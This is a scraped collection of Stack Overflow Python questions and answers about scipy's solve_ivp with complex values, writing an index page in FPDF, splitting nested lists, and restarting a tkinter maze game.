ax3.plot(t,-E_0 /w * vlinearFenster2)
ax3.xaxis.set_minor_locator(ticker.AutoMinorLocator())
ax3.set_xlabel("t in s")
ax3.grid(which = 'both')
plt.show()
sol = solver(0, 70,teval = t)
ts= sol.t
f=sol.y[0]
fsquared = 2* np.absolute(f)**2
plt.plot(ts,fsquared)
plt.show()
The plot for the window function looks like this (and is correct)
window function
however the plot for the solution looks like this:
Plot of pairproduction probability
This is not correct based on the paper's graphs (and further testing using Mathematica instead).
When running the line 'sol = solver(..)' it says:
\numpy\core\_asarray.py:102: ComplexWarning: Casting complex values to real discards the imaginary part
return array(a, dtype, copy=False, order=order)
I simply do not know why solve_ivp discards the imaginary part. It's absolutely necessary.
Can someone who knows more or sees the mistake enlighten me?
A:
According to the documentation, the y0 passed to solve_ivp must be of type complex in order for the integration to be over the complex domain. A robust way of ensuring this is to add the following to your code:
def solver(tmin, tmax,teval=None,f0=0,g0=1):
'''solves the system.
@tmin: starttime
@tmax: endtime
@f0: starting percentage of already present electrons of positive energy usually 0
@g0: starting percentage of already present electrons of negative energy, usually 1, therefore full vaccuum
'''
f0 = complex(f0) # <-- added
g0 = complex(g0) # <-- added
y0=[f0,g0]
tspan = np.array([tmin, tmax])
koeff = np.array([nu,kappa])
sol = solve_ivp(System,tspan,y0,t_eval= teval,args=koeff)
return sol
I tried the above, and it indeed made the warning disappear. However, the result of the integration seems to be the same regardless.
| solve_ivp discards imaginary part of complex solution | I am computing a solution to the free basis expansion of the Dirac equation for electron-positron pair production. For this I need to solve a system of equations that looks like this:
Equation for pair production, from Mocken et al.
EDIT: This has been solved by passing y0 as a complex type into the solver, as stated in this issue: https://github.com/scipy/scipy/issues/8453. I would definitely consider this a bug, but it seems to have gone under the radar for at least 4 years.
For this I am using SciPy's solve_ivp integrator in the following way:
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from scipy.integrate import solve_ivp
import scipy.constants as constants
#Impulse
px, py = 0 , 0
#physics constants
e = constants.e
m = constants.m_e # electronmass
c = constants.c
hbar = constants.hbar
#relativistic energy
E = np.sqrt(m**2 *c**4 + (px**2+py**2) * c**2) # E_p
#adiabatic parameter
xi = 1
#Parameter of the system
w = 0.840 #frequency in 1/m_e
N = 8 # amount of amplitudes in window
T = 2* np.pi/w
#unit system
c = 1
hbar = 1
m = 1
#strength of electric field
E_0 = xi*m*c*w/e
print(E_0)
#vectorpotential
A = lambda t,F: -E_0/w *np.sin(t)*F
def linearFenster2(t):
conditions = [t <=0, (t/w>=0) and (t/w <= T/2), (t/w >= T/2) and (t/w<=T*(N+1/2)), (t/w>=T*(N+1/2)) and (t/w<=T*(N+1)), t/w>=T*(N+1)]
funcs = [lambda t: 0, lambda t: 1/np.pi *t, lambda t: 1, lambda t: 1-w/np.pi * (t/w-T*(N+1/2)), lambda t: 0]
return np.piecewise(t,conditions,funcs)
#Coefficient functions
nu = lambda t: -1j/hbar *e*A(w*t,linearFenster2(w*t)) *np.exp(2*1j/hbar * E*t) *(px*py*c**2 /(E*(E+m*c**2)) + 1j*(1- c**2 *py**2/(E*(E+m*c**2))))
kappa = lambda t: 1j*e*A(t,linearFenster2(w*t))* c*py/(E * hbar)
#System to solve
def System(t, y, nu, kappa):
df = kappa(t) *y[0] + nu(t) * y[1]
dg = -np.conjugate(nu(t)) * y[0] + np.conjugate(kappa(t))*y[1]
return np.array([df,dg], dtype=np.cdouble)
def solver(tmin, tmax,teval=None,f0=0,g0=1):
'''solves the system.
@tmin: starttime
@tmax: endtime
@f0: starting percentage of already present electrons of positive energy usually 0
@g0: starting percentage of already present electrons of negative energy, usually 1, therefore full vaccuum
'''
y0=[f0,g0]
tspan = np.array([tmin, tmax])
koeff = np.array([nu,kappa])
sol = solve_ivp(System,tspan,y0,t_eval= teval,args=koeff)
return sol
#Plotting of windowfunction
amount = 10**2
t = np.arange(0, T*(N+1), 1/amount)
vlinearFenster2 = np.array([linearFenster2(w*a) for a in t ], dtype = float)
fig3, ax3 = plt.subplots(1,1,figsize=[24,8])
ax3.plot(t,E_0/w * vlinearFenster2)
ax3.plot(t,A(w*t,vlinearFenster2))
ax3.plot(t,-E_0 /w * vlinearFenster2)
ax3.xaxis.set_minor_locator(ticker.AutoMinorLocator())
ax3.set_xlabel("t in s")
ax3.grid(which = 'both')
plt.show()
sol = solver(0, 70,teval = t)
ts= sol.t
f=sol.y[0]
fsquared = 2* np.absolute(f)**2
plt.plot(ts,fsquared)
plt.show()
The plot for the window function looks like this (and is correct)
window function
however the plot for the solution looks like this:
Plot of pairproduction probability
This is not correct based on the paper's graphs (and further testing using Mathematica instead).
When running the line 'sol = solver(..)' it says:
\numpy\core\_asarray.py:102: ComplexWarning: Casting complex values to real discards the imaginary part
return array(a, dtype, copy=False, order=order)
I simply do not know why solve_ivp discards the imaginary part. It's absolutely necessary.
Can someone who knows more or sees the mistake enlighten me?
| [
"According to the documentation, the y0 passed to solve_ivp must be of type complex in order for the integration to be over the complex domain. A robust way of ensuring this is to add the following to your code:\ndef solver(tmin, tmax,teval=None,f0=0,g0=1):\n '''solves the system.\n @tmin: starttime\n @tmax: endtime\n @f0: starting percentage of already present electrons of positive energy usually 0 \n @g0: starting percentage of already present electrons of negative energy, usually 1, therefore full vaccuum\n '''\n f0 = complex(f0) # <-- added\n g0 = complex(g0) # <-- added\n y0=[f0,g0]\n tspan = np.array([tmin, tmax])\n koeff = np.array([nu,kappa])\n sol = solve_ivp(System,tspan,y0,t_eval= teval,args=koeff)\n return sol\n\nI tried the above, and it indeed made the warning disappear. However, the result of the integration seems to be the same regardless.\n"
] | [
0
] | [] | [] | [
"physics",
"python"
] | stackoverflow_0074602588_physics_python.txt |
Q:
Index page on FPDF. How to write to an existing page?
This question is related to this one.
I need to add an index page to the PDF and it needs to be placed after the main page.
So, the index should be on page 2 onwards.
I can add a blank page as a placeholder so that the others get the correct page number, then at the end when all pages are created I need to go back to the blank page and write the index (or create at the end of the document and replace the existing blank one).
If the index is more than one page (second problem) all the pages will need to update the index.
I can easily count the number of titles and estimate the amount of pages needed for the index.
How can I do this?
A:
Well, it's easier than I thought, I'll leave it here just in case someone stumbles upon the same issue.
Step 1: calculate the number of pages the index will need and add them as blank pages. This is not required, but it will make the page numbers correct from the start.
Step 2: before finalizing the document, use self.page = 2 to start adding content to page 2; this will reuse the blank pages added in the previous step.
| Index page on FPDF. How to write to an existing page? | This question is related to this one.
I need to add an index page to the PDF and it needs to be placed after the main page.
So, the index should be on page 2 onwards.
I can add a blank page as a placeholder so that the others get the correct page number, then at the end when all pages are created I need to go back to the blank page and write the index (or create at the end of the document and replace the existing blank one).
If the index is more than one page (second problem) all the pages will need to update the index.
I can easily count the number of titles and estimate the amount of pages needed for the index.
How can I do this?
| [
"Well, it's easier than I thought, I'll leave it here just in case someone stumbles upon the same issue.\n1 step: calculate the number of pages the index will need and add them as blank pages, not required, but will make the page numbers correct already\n2 step: before finalizing the document, use self.page = 2 to start adding content to page 2, this will use the blank pages used in the previous step\n"
] | [
0
] | [] | [] | [
"fpdf",
"python"
] | stackoverflow_0074465361_fpdf_python.txt |
Q:
Splitting lists into to different lists
I have a list:
list = [['X', 'Y'], 'A', 1, 2, 3]
That I want to split into:
new_list = [['X','A', 1, 2, 3] , ['Y', 'A', 1, 2, 3]]
Is this possible?
A:
Sure, take off the first element to create an outer loop, and then loop over the rest of the list to build the sub-lists:
lst = [['X', 'Y'], 'A', 1, 2, 3]
new_list = []
for item in lst[0]:
sub = [item]
for sub_item in lst[1:]:
sub.append(sub_item)
new_list.append(sub)
Or, as a comprehension:
new_list = [[item, *lst[1:]] for item in lst[0]]
Where the *lst[1:] will unpack the slice into the newly created list.
Borrowing that idea for the imperative for-loop:
new_list = []
for item in lst[0]:
sub = [item, *lst[1:]]
new_list.append(sub)
A:
I'll suggest a more concise approach that uses iterable unpacking -- IMO it's cleaner than using list slices.
We take the first element of lst and separate it from the rest of the list. Then, we use a list comprehension to create a new list for every element in the original sublist of lst:
lst = [['X', 'Y'], 'A', 1, 2, 3]
fst, *rest = lst
[[elem, *rest] for elem in fst]
This outputs:
[['X', 'A', 1, 2, 3], ['Y', 'A', 1, 2, 3]]
A:
This is probably not the best approach, but it works:
l = [['X', 'Y'], 'A', 1, 2, 3]
new_list = []
to_append = []
for item in l:
if isinstance(item, list):
new_list.append(item)
continue
to_append.append(item)
new_list.append(to_append)
print(new_list)
A:
Yes, the code below returns exactly what you want.
list = [['X', 'Y'], 'A', 1, 2, 3]
new_list = []
for item in list[0]:
new_list.append([item] + list[1:])
print(new_list)
| Splitting lists into to different lists | I have a list:
list = [['X', 'Y'], 'A', 1, 2, 3]
That I want to split into:
new_list = [['X','A', 1, 2, 3] , ['Y', 'A', 1, 2, 3]]
Is this possible?
| [
"Sure, take off the first element to create an outer loop, and then loop over the rest of the list to build the sub-lists:\nlst = [['X', 'Y'], 'A', 1, 2, 3]\n\nnew_list = []\n\nfor item in lst[0]:\n sub = [item]\n for sub_item in lst[1:]:\n sub.append(sub_item)\n new_list.append(sub)\n\nOr, as a comprehension:\nnew_list = [[item, *lst[1:]] for item in lst[0]]\n\nWhere the *lst[1:] will unpack the slice into the newly created list.\nBorrowing that idea for the imperative for-loop:\nnew_list = []\n\nfor item in lst[0]:\n sub = [item, *lst[1:]]\n new_list.append(sub)\n\n",
"I'll suggest a more concise approach that uses iterable unpacking -- IMO it's cleaner than using list slices.\nWe take the first element of lst and separate it from the rest of the list. Then, we use a list comprehension to create a new list for every element in the original sublist of lst:\nlst = [['X', 'Y'], 'A', 1, 2, 3]\nfst, *rest = lst\n\n[[elem, *rest] for elem in fst]\n\nThis outputs:\n[['X', 'A', 1, 2, 3], ['Y', 'A', 1, 2, 3]]\n\n",
"This probably not the best aproach but it works\nl = [['X', 'Y'], 'A', 1, 2, 3]\n\nnew_list = []\nto_append = []\nfor item in l:\n if isinstance(item, list):\n new_list.append(item)\n continue\n\n to_append.append(item)\n\nnew_list.append(to_append)\nprint(new_list)\n\n",
"Yes, the code below returns exactly what you want.\nlist = [['X', 'Y'], 'A', 1, 2, 3]\nnew_list = []\n\nfor i, item in enumerate(list[0]):\n new_list.append([item] + list[1:])\n\nprint(new_list)\n\n"
] | [
2,
2,
0,
0
] | [] | [] | [
"list",
"python"
] | stackoverflow_0074603020_list_python.txt |
Q:
How to loop the maze
I'm a beginner with Python. I couldn't figure out how to start a new game in my maze.
I have tried various options, but they all end with errors. What should I do? Thank you in advance.
I have tried destroying the frame_top where the maze is located and then creating another maze with the function new_game, but this function raises errors:
import tkinter as tk
import random
from tkinter import messagebox
global SIZE
global ROW
global COLUMN
SIZE = 10
COLUMN = 7
ROW = 7
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
def dig(x, y) :
maze[y][x] = "PATH"
canMove = []
if maze[y-1][x]=="FIELD" and maze[y-2][x]=="FIELD" :
canMove.append("UP")
if maze[y+1][x]=="FIELD" and maze[y+2][x]=="FIELD" :
canMove.append("DOWN")
if maze[y][x-1]=="FIELD" and maze[y][x-2]=="FIELD" :
canMove.append("LEFT")
if maze[y][x+1]=="FIELD" and maze[y][x+2]=="FIELD" :
canMove.append("RIGHT")
if len(canMove)==0 :
return
direction = random.choice(canMove)
if direction=="UP" :
maze[y-1][x]="PATH"
maze[y-2][x]="PATH"
y -= 2
if direction=="DOWN" :
maze[y+1][x]="PATH"
maze[y+2][x]="PATH"
y += 2
if direction=="LEFT" :
maze[y][x-1]="PATH"
maze[y][x-2]="PATH"
x -= 2
if direction=="RIGHT" :
maze[y][x+1]="PATH"
maze[y][x+2]="PATH"
x += 2
departure.append([x, y])
dig(x, y)
## print(departure)
## print(dig(x, y))
def keyPress(event) :
global playerX,playerY,beforeX,beforeY
if event.keysym=="Up" and maze[playerY-1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY -=1
if event.keysym=="Down" and maze[playerY+1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY +=1
if event.keysym=="Left" and maze[playerY][playerX-1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX -=1
if event.keysym=="Right" and maze[playerY][playerX+1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX +=1
def move() :
can.create_oval(beforeX*SIZE+1, beforeY*SIZE+1, (beforeX+1)*SIZE-1, (beforeY+1)*SIZE-1, fill="white", width=0)
can.create_oval(playerX*SIZE+2, playerY*SIZE+2, (playerX+1)*SIZE-2, (playerY+1)*SIZE-2, fill="blue")
if playerX==COLUMN-2 and playerY==ROW-2 :
messagebox.showinfo("INFORMATION", "CONGRATULATIONS!!!")
frame_top.destroy()
## for widget in frame_top.winfo_children():
## widget.destroy()
new_game()
can.after(100, move)
def new_game():
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
canMove = []
print (maze)
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
move()
global win
win = tk.Tk()
frame_top = tk.Frame(win)
frame_top.pack()
global can
can = tk.Canvas(frame_top, width=COLUMN*SIZE, height=ROW*SIZE)
can.pack()
m = tk.Menu(win)
win.config(menu=m)
fm = tk.Menu(m, tearoff=0)
om = tk.Menu(m, tearoff=0)
m.add_cascade(label='Options', menu=om)
om.add_command(label='New Game',command= new_game )
om.add_command(label='Settings', )
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
move()
win.bind("<Any-KeyPress>", keyPress)
win.mainloop()
Exception in Tkinter callback
Traceback (most recent call last):
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 1921, in __call__
return self.func(*args)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py",
line 839, in callit
func(*args)
File "C:/Users/Admin/AppData/Local/Programs/Python/Python310/fileend.py",
line 92, in move
new_game()
File "C:/Users/Admin/AppData/Local/Programs/Python/Python310/fileend.py", line 128, in new_game
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 2835, in create_rectangle
return self._create('rectangle', args, kw)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 2805, in _create
return self.tk.getint(self.tk.call(
_tkinter.TclError: invalid command name ".!frame.!canvas"
A:
You use two different ways to create a new game, so they differ from each other and it is hard to see what goes wrong. One of them is the main flow and the other is the new_game method; I just merged them.
Second, you destroy your frame and the canvas inside it, so you also destroyed your canvas; this is why you get errors. Instead, can.delete("all") will clear all the items inside.
You have a keyPress(event) function, so you do not need to update move() tens of times every second. Just update by calling move() whenever a key press arrives.
Another thing: when you are moving inside the maze, instead of moving your player you are creating a new blue dot and repainting the old one. That is a bad habit you should avoid; with a lot of movement inside your maze, that mess would slow things down.
Lastly, in your new_game method you need to use the global keyword, otherwise your assignments only create local variables.
This is the full solution. It correctly starts new games and contains all the improvements mentioned above.
import tkinter as tk
import random
from tkinter import messagebox
SIZE = 10
COLUMN = 7
ROW = 7
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
player = None
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
def dig(x, y) :
maze[y][x] = "PATH"
canMove = []
if maze[y-1][x]=="FIELD" and maze[y-2][x]=="FIELD" :
canMove.append("UP")
if maze[y+1][x]=="FIELD" and maze[y+2][x]=="FIELD" :
canMove.append("DOWN")
if maze[y][x-1]=="FIELD" and maze[y][x-2]=="FIELD" :
canMove.append("LEFT")
if maze[y][x+1]=="FIELD" and maze[y][x+2]=="FIELD" :
canMove.append("RIGHT")
if len(canMove)==0 :
return
direction = random.choice(canMove)
if direction=="UP" :
maze[y-1][x]="PATH"
maze[y-2][x]="PATH"
y -= 2
if direction=="DOWN" :
maze[y+1][x]="PATH"
maze[y+2][x]="PATH"
y += 2
if direction=="LEFT" :
maze[y][x-1]="PATH"
maze[y][x-2]="PATH"
x -= 2
if direction=="RIGHT" :
maze[y][x+1]="PATH"
maze[y][x+2]="PATH"
x += 2
departure.append([x, y])
dig(x, y)
def keyPress(event) :
global playerX,playerY,beforeX,beforeY
if event.keysym=="Up" and maze[playerY-1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY -=1
if event.keysym=="Down" and maze[playerY+1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY +=1
if event.keysym=="Left" and maze[playerY][playerX-1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX -=1
if event.keysym=="Right" and maze[playerY][playerX+1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX +=1
move()
def move() :
can.moveto(player,playerX*SIZE+1, playerY*SIZE+1)
print(playerX,playerY)
if playerX==COLUMN-2 and playerY==ROW-2 :
messagebox.showinfo("INFORMATION", "CONGRATULATIONS!!!")
can.delete("all")
## for widget in frame_top.winfo_children():
## widget.destroy()
new_game()
def new_game():
global player,playerX,playerY,beforeX,beforeY,departure,maze
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
canMove = []
print (maze)
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
player = can.create_oval(playerX*SIZE+2, playerY*SIZE+2, (playerX+1)*SIZE-2, (playerY+1)*SIZE-2, fill="blue")
can.tag_raise(player)
global win
win = tk.Tk()
frame_top = tk.Frame(win)
frame_top.pack()
global can
can = tk.Canvas(frame_top, width=COLUMN*SIZE, height=ROW*SIZE)
can.pack()
m = tk.Menu(win)
win.config(menu=m)
fm = tk.Menu(m, tearoff=0)
om = tk.Menu(m, tearoff=0)
m.add_cascade(label='Options', menu=om)
om.add_command(label='New Game',command= new_game )
om.add_command(label='Settings', )
new_game()
win.bind("<Any-KeyPress>", keyPress)
win.mainloop()
| How to loop the maze | I'm a beginner with Python. I couldn't figure out how to start a new game in my maze.
I have tried various options, but they all end with errors. What should I do? Thank you in advance.
I have tried destroying the frame_top where the maze is located and then creating another maze with the function new_game, but this function raises errors:
import tkinter as tk
import random
from tkinter import messagebox
global SIZE
global ROW
global COLUMN
SIZE = 10
COLUMN = 7
ROW = 7
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
def dig(x, y) :
maze[y][x] = "PATH"
canMove = []
if maze[y-1][x]=="FIELD" and maze[y-2][x]=="FIELD" :
canMove.append("UP")
if maze[y+1][x]=="FIELD" and maze[y+2][x]=="FIELD" :
canMove.append("DOWN")
if maze[y][x-1]=="FIELD" and maze[y][x-2]=="FIELD" :
canMove.append("LEFT")
if maze[y][x+1]=="FIELD" and maze[y][x+2]=="FIELD" :
canMove.append("RIGHT")
if len(canMove)==0 :
return
direction = random.choice(canMove)
if direction=="UP" :
maze[y-1][x]="PATH"
maze[y-2][x]="PATH"
y -= 2
if direction=="DOWN" :
maze[y+1][x]="PATH"
maze[y+2][x]="PATH"
y += 2
if direction=="LEFT" :
maze[y][x-1]="PATH"
maze[y][x-2]="PATH"
x -= 2
if direction=="RIGHT" :
maze[y][x+1]="PATH"
maze[y][x+2]="PATH"
x += 2
departure.append([x, y])
dig(x, y)
## print(departure)
## print(dig(x, y))
def keyPress(event) :
global playerX,playerY,beforeX,beforeY
if event.keysym=="Up" and maze[playerY-1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY -=1
if event.keysym=="Down" and maze[playerY+1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY +=1
if event.keysym=="Left" and maze[playerY][playerX-1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX -=1
if event.keysym=="Right" and maze[playerY][playerX+1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX +=1
def move() :
can.create_oval(beforeX*SIZE+1, beforeY*SIZE+1, (beforeX+1)*SIZE-1, (beforeY+1)*SIZE-1, fill="white", width=0)
can.create_oval(playerX*SIZE+2, playerY*SIZE+2, (playerX+1)*SIZE-2, (playerY+1)*SIZE-2, fill="blue")
if playerX==COLUMN-2 and playerY==ROW-2 :
messagebox.showinfo("INFORMATION", "CONGRATULATIONS!!!")
frame_top.destroy()
## for widget in frame_top.winfo_children():
## widget.destroy()
new_game()
can.after(100, move)
def new_game():
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
canMove = []
print (maze)
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
move()
global win
win = tk.Tk()
frame_top = tk.Frame(win)
frame_top.pack()
global can
can = tk.Canvas(frame_top, width=COLUMN*SIZE, height=ROW*SIZE)
can.pack()
m = tk.Menu(win)
win.config(menu=m)
fm = tk.Menu(m, tearoff=0)
om = tk.Menu(m, tearoff=0)
m.add_cascade(label='Options', menu=om)
om.add_command(label='New Game',command= new_game )
om.add_command(label='Settings', )
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
move()
win.bind("<Any-KeyPress>", keyPress)
win.mainloop()
main()
Exception in Tkinter callback
Traceback (most recent call last):
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 1921, in __call__
return self.func(*args)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py",
line 839, in callit
func(*args)
File "C:/Users/Admin/AppData/Local/Programs/Python/Python310/fileend.py",
line 92, in move
new_game()
File "C:/Users/Admin/AppData/Local/Programs/Python/Python310/fileend.py", line 128, in new_game
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 2835, in create_rectangle
return self._create('rectangle', args, kw)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 2805, in _create
return self.tk.getint(self.tk.call(
_tkinter.TclError: invalid command name ".!frame.!canvas"
| [
"You use two different ways to create a new game. So it's differ from each other and you do not understand what you make wrong.One them main flow and other one is new_game method. I just merged them.\nSecond thing is you destroy your frame and your canvas inside it. So you also destroyed your canvas this is why yo get errors. Instead can.delete(\"all\") going to clear all items inside.\nYou have keypress(event) function yo do not need to update tens of times every second your move(). Just if you get any press, simple update it by calling move function.\nOther thing is, when you are moving inside maze, instead of moving your player you are creating a new blue dot and repaint your old dot. It's bad habit you should avoid it. If it would be too much movement inside your maze, that mess would cause to slow down.\nLastly, in your new_game method you need to use global keyword otherwise your declerations only creates local variables.\nThis is full solution. It correctly starts new games and contains all improvements mentioned above.\nimport tkinter as tk\nimport random\nfrom tkinter import messagebox\n\nSIZE = 10\nCOLUMN = 7\nROW = 7\n\ndeparture = [[1, 1]] \nplayerX = 1\nplayerY = 1\nbeforeX = 1\nbeforeY = 1\n\nmaze = []\nplayer = None\nfor y in range(ROW) :\n sub = []\n for x in range(COLUMN) :\n if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :\n sub.append(\"WALL\")\n else :\n sub.append(\"FIELD\")\n maze.append(sub)\n\ndef dig(x, y) :\n maze[y][x] = \"PATH\"\n canMove = []\n if maze[y-1][x]==\"FIELD\" and maze[y-2][x]==\"FIELD\" :\n canMove.append(\"UP\")\n if maze[y+1][x]==\"FIELD\" and maze[y+2][x]==\"FIELD\" :\n canMove.append(\"DOWN\")\n if maze[y][x-1]==\"FIELD\" and maze[y][x-2]==\"FIELD\" :\n canMove.append(\"LEFT\")\n if maze[y][x+1]==\"FIELD\" and maze[y][x+2]==\"FIELD\" :\n canMove.append(\"RIGHT\")\n if len(canMove)==0 :\n return\n \n direction = random.choice(canMove)\n if direction==\"UP\" :\n maze[y-1][x]=\"PATH\"\n maze[y-2][x]=\"PATH\"\n y -= 2\n if direction==\"DOWN\" :\n maze[y+1][x]=\"PATH\"\n maze[y+2][x]=\"PATH\"\n y += 2\n if direction==\"LEFT\" :\n maze[y][x-1]=\"PATH\"\n maze[y][x-2]=\"PATH\"\n x -= 2\n if direction==\"RIGHT\" :\n maze[y][x+1]=\"PATH\"\n maze[y][x+2]=\"PATH\"\n x += 2\n departure.append([x, y]) \n dig(x, y) \n\n\ndef keyPress(event) :\n global playerX,playerY,beforeX,beforeY\n if event.keysym==\"Up\" and maze[playerY-1][playerX]==\"PATH\" :\n beforeX = playerX\n beforeY = playerY\n playerY -=1\n if event.keysym==\"Down\" and maze[playerY+1][playerX]==\"PATH\" :\n beforeX = playerX\n beforeY = playerY\n playerY +=1\n if event.keysym==\"Left\" and maze[playerY][playerX-1]==\"PATH\" :\n beforeX = playerX\n beforeY = playerY\n playerX -=1\n if event.keysym==\"Right\" and maze[playerY][playerX+1]==\"PATH\" :\n beforeX = playerX\n beforeY = playerY\n playerX +=1\n move()\n\ndef move() :\n can.moveto(player,playerX*SIZE+1, playerY*SIZE+1)\n print(playerX,playerY)\n if playerX==COLUMN-2 and playerY==ROW-2 :\n messagebox.showinfo(\"INFORMATION\", \"CONGRATULATIONS!!!\")\n can.delete(\"all\")\n## for widget in frame_top.winfo_children():\n## widget.destroy()\n new_game()\n\n \ndef new_game():\n global player,playerX,playerY,beforeX,beforeY,departure,maze\n departure = [[1, 1]] \n playerX = 1\n playerY = 1\n beforeX = 1\n beforeY = 1\n maze = []\n canMove = []\n print (maze)\n for y in range(ROW) :\n sub = []\n for x in range(COLUMN) :\n if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :\n sub.append(\"WALL\")\n else :\n sub.append(\"FIELD\")\n maze.append(sub)\n while 
len(departure)!=0 : \n start = departure.pop(0)\n x = start[0]\n y = start[1]\n dig(x, y)\n print(x)\n print(y)\n\n for y in range(ROW): \n for x in range(COLUMN):\n if maze[y][x]==\"PATH\" :\n color = \"white\"\n else :\n color = \"black\"\n can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)\n\n can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill=\"red\") \n \n player = can.create_oval(playerX*SIZE+2, playerY*SIZE+2, (playerX+1)*SIZE-2, (playerY+1)*SIZE-2, fill=\"blue\")\n can.tag_raise(player)\n \n\n\n\nglobal win\nwin = tk.Tk()\nframe_top = tk.Frame(win)\nframe_top.pack()\n\nglobal can\ncan = tk.Canvas(frame_top, width=COLUMN*SIZE, height=ROW*SIZE)\ncan.pack()\n\n\n\nm = tk.Menu(win)\nwin.config(menu=m)\nfm = tk.Menu(m, tearoff=0)\n\nom = tk.Menu(m, tearoff=0)\nm.add_cascade(label='Options', menu=om)\nom.add_command(label='New Game',command= new_game )\n\nom.add_command(label='Settings', )\n\n\nnew_game()\n\n\nwin.bind(\"<Any-KeyPress>\", 